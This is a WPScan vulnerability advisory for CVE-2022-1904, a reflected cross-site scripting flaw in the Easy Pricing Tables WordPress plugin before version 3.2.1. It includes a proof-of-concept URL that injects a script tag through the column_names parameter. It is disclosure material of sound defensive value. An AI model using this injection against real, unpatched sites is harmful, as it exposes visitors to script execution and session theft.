WPScan
How it worksPricing
Vulnerabilities
WordPressPluginsThemesStatsSubmit vulnerabilities
For developers
StatusAPI detailsCLI scanner
Contact

WordPress Plugin Vulnerabilities

Easy Pricing Tables < 3.2.1 - Reflected Cross-Site-Scripting

Description

The plugin does not sanitise and escape  parameter before outputting it back in a page available to any user (both authenticated and unauthenticated) when a specific setting is enabled, leading to a Reflected Cross-Site Scripting

Proof of Concept

With the "Compatibility Mode" (/wp-admin/edit.php?post_type=easy-pricing-table&page=easy-pricing-tables-settings) setting enabled:

https://example.com/wp-admin/admin-ajax.php?action=ptp_design4_color_columns&post_id=1&column_names=<script>alert(`xss`)</script>

Affects Plugins

easy-pricing-tables
Fixed in version 3.2.1

References

CVE
CVE-2022-1904

Classification

Type

XSS

OWASP top 10
A7: Cross-Site Scripting (XSS)
CWE
CWE-79

Miscellaneous

Original Researcher

cydave

Submitter

cydave

Submitter website
https://cyllective.com/
Submitter twitter
cyllective
Verified

Yes

WPVDB ID
92215d07-d129-49b4-a838-0de1a944c06b

Timeline

Publicly Published

2022-05-31 (about 1 years ago)

Added

2022-05-31 (about 1 years ago)

Last Updated

2023-03-01 (about 6 months ago)

Our Other Services

WPScan WordPress Security Plugin